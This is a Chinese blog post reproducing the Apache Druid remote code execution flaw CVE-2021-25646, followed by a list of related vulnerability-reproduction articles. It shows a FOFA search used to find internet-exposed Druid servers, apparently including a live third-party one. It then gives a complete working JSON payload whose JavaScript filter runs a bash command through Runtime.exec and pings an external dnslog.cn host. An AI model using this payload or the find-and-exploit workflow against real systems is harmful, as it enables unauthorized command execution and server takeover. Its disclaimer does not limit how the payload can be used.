程序员经验分享-hwhale

Apache Druid远程代码执行漏洞复现(CVE-2021-25646)

2023-11-02

Apache Druid远程代码执行漏洞复现(CVE-2021-25646)

漏洞描述

Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。

影响版本

Apache Druid < 0.20.1

漏洞环境以及复现

fofa搜索:title=“Apache Druid”
在这里插入图片描述
打开第一个网址,访问特定目录,目录存在:/druid/indexer/v1/sampler
在这里插入图片描述

利用bp抓包,发送payload:
在这里插入图片描述

查看dnslog:
在这里插入图片描述

命令执行成功!!!
payload:

{
	"type":"index","spec":{
		"type":"index",
		"ioConfig":{
			"type":"index","inputSource":{
				"type":"http",
				"uris":["https://www.baidu.com"]
			},"inputFormat":{
				"type":"tsv",
				"findColumnsFromHeader":true
			}
		},"dataSchema":{
			"dataSource":"sample",
			"timestampSpec":{
				"column":"timestamp",
				"missingValue":"2010-01-01T00:00:00Z"
			},"dimensionsSpec":{},
			"transformSpec":{
				"transforms":[],
				"filter":{
					"type": "javascript",
					"function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping aasdasdd.u6zdp0.dnslog.cn')}",
					"dimension": "added",
					"": {
						"enabled": "true"
					}
				}
			}
		},"type":"index",
		"tuningConfig":{
			"type":"index"
		}
	},"samplerConfig":{
		"numRows":50,
		"timeoutMs":10000
	}
}

最后

以上仅为验证漏洞存在,切勿用于实战,造成影响与作者无关。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

漏洞复现

web渗透

Apache Druid远程代码执行漏洞复现(CVE-2021-25646) 的相关文章

  • 【1day】复现时空智友企业流程化管控系统文件上传漏洞

    注 该文章来自作者日常学习笔记 请勿利用文章内的相关技术从事非法测试 如因此产生的一切不良后果与作者无关 目录 一 漏洞描述 二 影响版本 三 资产测绘 四 漏洞复现 一 漏洞描

  • 常见中间件——Tomcat漏洞复现分析

    文章目录 Tomcat 任意文件写入 CVE 2017 12615 漏洞本质 原因 jsp木马 绕过方式 修复建议 Tomcat 远程代码执行 CVE 2019 0232 漏洞本质 修复建议 Tomcat 文件包含漏洞 CVE 2020 1

  • [Pikachu靶场实战系列]RCE(远程系统命令执行)

    RCE介绍 exec ping 可以输入一个ip地址 结果发现页面无回显 难道不应该回显Ping命令的结果吗 不过我们不管他 继续下一步 在ip后用 分割再输入一个ls命令 发现ls命令被执行了 说明开发者没有做严格的安全控制 没有想到我们

  • 高级程序员解决问题的思维模式和普通程序员的区别在哪里?

    作者主页 士别三日wyx 先给你出一道题 看你会如何思考 假设你是一个程序员 常年保持自学和超长工作时长的状态 承受着不为人知的压力和痛苦 面对同行程序员的攀比和压力 在公司title 年薪 房子之间深陷 35岁大限越来越近 头顶日愈清凉

  • D-Link DCS 密码泄露漏洞

    0x01 前言 本次测试仅供学习使用 如若非法他用 与本文作者无关 需自行负责 0x02 漏洞描述 D link DCS是一款成像色彩为彩色 是一款网络摄像机 D link DCS系统存在密码泄露漏洞 攻击者通过漏洞可以获取后台权限 0x0

  • vulnhub-lampiao

    lampiao 1 信息收集 nmap p 192 168 14 189 dirb http 192 168 14 189 1898 X txt php 发现更新日志文件CHANGLOG txt 访问更新日志文件CHANGELOG txt

  • DVWA靶场之XSS通关详解

    原理 XSS漏洞是攻击者将恶意代码注入到合法网页中 当用户浏览该页面时 恶意代码会被执行 从而获取用户敏感信息或进行其他攻击 形成原因 网站对用户输入数据的过滤不严格或不完备 攻击者可以根据这个漏洞向网站提交恶意代码 然后再将这些代码传播给

  • typecho反序列化漏洞复现

    typecho框架存在反序列化漏洞 利用此漏洞可执行任意代码 环境搭建 第一步 第二步 第三步 第三步 第四步 第五步 第六步 第七步 第八步 第九步 漏洞分析 typecho build install php 文件中 使用unseria

  • ActiveMQ 反序列化漏洞(CVE-2015-5254)漏洞复现vulhub

    ActiveMQ 反序列化漏洞 CVE 2015 5254 Apache ActiveMQ是美国阿帕奇 Apache 软件基金会所研发的一套开源的消息中间件 它支持Java消息服务 集群 Spring Framework等 Apache A

  • 泛微E-Mobile 6.0远程命令执行漏洞

    前言 本次测试仅供学习使用 如若非法他用 与本文作者无关 需自行负责 漏洞描述 Weaver E Mobile是中国泛微科技 Weaver 公司的一个协同办公系统 E Mobile6最新版是上海泛微网络科技推出的一款手机办公应用 将企业微信

  • CMS V5.7 SP2漏洞复现(CVE-2018-20129)

    0x00 前置 1 CVE中对该漏洞的描述 在 DedeCMS V5 7 SP2 中发现了一个问题 uploads include dialog select images post php 允许远程攻击者通过双扩展名和修改的 php 子字

  • IIS7.0、7.5解析漏洞利用

    IIS7 0 7 5解析漏洞利用 1 测试漏洞是否可用 2 WebShell制作 3 上传WebShell 4 连接WebShell 1 测试漏洞是否可用 网站任意图片地址后加 脚本类型 若出现编译错误 则漏洞存在 2 WebShell制作

  • 万户协同办公平台ezoffice未授权访问漏洞

    文章目录 0x01 前言 0x02 漏洞描述 0x03 影响范围 0x04 漏洞环境 0x05 漏洞复现 1 构造POC 2 进行MD5值解密 3 尝试进行登录 0x06 复现建议 0x01 前言 本次测试仅供学习使用 如若非法他用 与本文

  • 《计算机组成原理》BCD码 8421编码原理剖析

    作者主页 士别三日wyx BCD码 1 BCD码的作用 2 BCD码的转换原理 3 8421编码 3 1 8421编码的权重划分 3 2 8421编码的加法运算 3 3 8461编码的加6修正 1 BCD码的作用 首先问大家一个问题 计算机

  • phpstudy2016 RCE漏洞验证

    文章目录 漏洞描述 漏洞验证 漏洞描述 PHPStudyRCE Remote Code Execution 也称为phpstudy backdoor漏洞 是指PHPStudy软件中存在的一个远程代码执行漏洞 漏洞验证 打开phpstudy2

  • 泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648)

    0x01 产品简介 泛微E Office是一款标准化的协同 OA 办公软件 泛微协同办公产品系列成员之一 实行通用化产品设计 充分贴合企业管理需求 本着简洁易用 高效智能的原则 为企业快速打造移动化 无纸化 数字化的办公平台 0x02 漏洞

  • 漏洞复现----ThinkCMF框架任意内容包含漏洞分析复现

    0x00 简介 ThinkCMF是一款基于ThinkPHP MySQL开发的中文内容管理框架 ThinkCMF提出灵活的应用机制 框架自身提供基础的管理功能 而开发者可以根据自身的需求以应用的形式进行扩展 每个应用都能独立的完成自己的任务

  • [网络安全自学篇] 二十七.Sqlmap基础知识、CTF实战及请求参数设置(一)

    这是作者的系列网络安全自学教程 主要是关于网安工具和实践操作的在线笔记 特分享出来与博友共勉 希望您们喜欢 一起进步 前文分享了Shodan搜索引擎的基本用法及Python命令行 本篇文章详细讲解了Sqlmap的基本用法 CTF实战 并且分

  • 安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现

    简介 安恒明御安全网关是一个网络安全产品 由安恒信息技术股份有限公司开发和提供 它是一个综合性的安全管理平台 用于保护企业网络免受各种网络威胁的攻击 该产品aaa local web preview端点存在文件上传漏洞 漏洞复现 FOFA语

  • SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195)

    0x01 产品简介 SpiderFlow是新一代爬虫平台 以图形化方式定义爬虫流程 以流程图的方式定义爬虫 不写代码即可完成爬虫 是一个高度灵活可配置的爬虫平台 0x02 漏洞概述 SpiderFlow爬虫平台src main java o

随机推荐

  • Hololens2开发笔记-Unity项目获取IMU传感器数据

    文章目录 前言 环境 使用指南 运行结果 前言 在仔细捣鼓了 HoloLens2 研究模式的 API 文档后 借鉴了官方案例 SensorVisualization 和这位哥们的代码 HoloLens2 Unity ResearchMode

  • 记一次初学者的spring boot 打包部署

    作为一个前端程序员 好不容易用第一次使用spring boot 写了一个项目 idea里面运行的ok 心里暗自窃喜 但是没想到打包就出现问题 折腾了一天 现在总结一下 先看一下我的项目的结构 这是我的项目 主项目是一个spring boot

  • Java web编写的学生作业管理系统 课程设计 功能齐全、界面漂亮

    8月份由于公司的事情太多 基本上没有更新博客信息 今天稍微空了点 继续为为大家介绍Java web项目 今天要介绍的是一个Java web编写的学生作业管理系统 学生作业管理系统有三种用户类型 学生 老师 系统管理员 学生的主要功能包括 查

  • 多态的定义以及使用

    多态的定义以及使用 package Demo08 代码当中体现多态性 其实就是一句话 父类引用指向子类对象 什么叫多态 左父右子就叫多态 可以通过创建一个对象来调用父类和子类两个 格式 父类名称 对象名 new 子类名称 或者 接口名称 对

  • 区块链二级知识考试

    区块链基础知识二级考试 考试时间30分钟 总分100分 请认真作答 出题人及监考老师 高志豪 请转载者注明 谢谢支持 一 单选题 每题5分 共30分 1 中本聪是哪里人 A 中国人 B 美国人 C 日本人 D 不确定 2 下面哪种共识机制效

  • WPF DataGrid 导出Excel

    region Excel导出 private void btnExportExcel Click object sender RoutedEventArgs e Export this dgvList XX信息查询列表 public voi

  • STM32 F1,F4,CAN多字节发送和接收

    一 简介 CAN的基础知识在这里不做过多介绍 其他网站上讲解的很基础 因为CAN一次性只能接收1字节8位 所以在这里只介绍怎样让CAN能像串口那样一次性接收非常多的位 亲测有效 具体先看效果图 在这里我的实现是通过两块STM32板子 可以是

  • 【mac】mac鼠标指针跟随很慢的问题

    使用时感觉鼠标指针跟随太慢 在系统偏好设置里面将鼠标跟随速度调到最大 还是感觉很慢 后来在网上找到了一个通过命令行改全局配置的方式调快跟随速度 具体方法如下 可以先查看一下当前值 打开终端 输入命令 lcc localhost defaul

  • html的实体字符,h5展示特殊符号<>

    前言 在 HTML 中 某些字符是预留的 不能使用小于号 lt 和大于号 gt 这是因为浏览器会误认为它们是标签 比如 这样是不行的 p lt p 比如用实体字符 p lt p HTML 中有用的字符实体 注释 实体名称对大小写敏感 显示结

  • 单链表的创建、单链表的删除、单链表的插入(数据结构)

    1 创建一个超级简单的单链表 include

  • 用HttpClient抓取人人网高校数据库(省,高校,院系三级级联)--更新1

    更新备注 将src文件改成了一个完整的项目 解压后可以直接导入到Eclipse中去 省去大家配置 项目乱码请改项目属性为GBK 另外 如果你要登陆人人网 的话 需要申请一个人人网账号 这里提供公用的 lei d0809 gmail com

  • matlab画三维、二维动态曲线

    matlab画三维 二维动态曲线 画三维曲线动图 xlabel X m ylabel Y m zlabel Z m grid on for i 1 length x 1 axis 0 05 2 5 0 05 5 0 1 0 1 line x

  • Matlab—频谱分析作图

    clf fs 50 采样频率 每秒钟采样多少个点 N 60 采样点数量 T N fs 采样时间 n 0 N 1 t n fs 时间序列 f n fs N 频率序列 y1 10 sin 2 pi 15 t y2 10 sin 2 pi 20

  • 硬件第二节 MOS管电路工作原理及详解

    文章目录 一 MOS管画法辨认 1 1 辨认MOS管 二 MOS管使用 2 1 作为开关管 2 1 1 导通条件 2 1 2实例 三 如何选择MOS管 3 1 MOS管需要注意的几个参数 3 1 1 选择PMOS还是NMOS 3 1 2 电

  • Proxmox VE(PVE) 进行网卡直通

    文章目录 我的设备 介绍 添加CPU支持 开启iommu 查询网卡信息 Intel CPU AMD CPU 新增所需模块 添加PCI设备 命令模式添加 web页面模式添加 验证IOMMU有效 IOMMU中断重映射 查看中断重映射 启用中断重

  • 用函数输出星星

    2013 11 10 11 54 0人阅读 评论 0 收藏 编辑 删除 01 02 程序的版权和版本声明部分 03 Copyright c 2013 烟台大学计算机学院 04 All rights reserved 05 文件名称 test

  • 静态测试和动态测试

    静态测试 不运行被测试的软件系统 而是采用其他手段和技术对被测试软件进行检测的一种测试技术 代码走读 文档评审 程序分析等 静态测试常用技术 静态分析技术 1 定义 一种不通过执行程序而分析程序执行的技术 2 功能 检查软件的表示和描述是否

  • flask获取post参数_Flask教程2:模板

    什么是模板 模板负责定义页面的显示样式 与应用的逻辑相互独立 在Flask中 模板放在templates文件夹 是单独的html文件 编写一个模板 在app文件夹内创建templates文件夹 并新建index html文件 用来显示用户的

  • sqlilabs第26a

    sqlilabs第26a 一 手注 有错误希望师傅们指出 一 手注 直接看源码 无回显 我使用boolean盲注 过滤了and 空格 注释 空格可以通过 或者 0a绕过 and可以用 或者双写绕过 但这道题 不行 注释使用 1 1闭合 判断

  • Apache Druid远程代码执行漏洞复现(CVE-2021-25646)

    Apache Druid远程代码执行漏洞复现 CVE 2021 25646 漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码 此功能在用于高信任度环境中 默认已被禁用 但是 在Drui

热门标签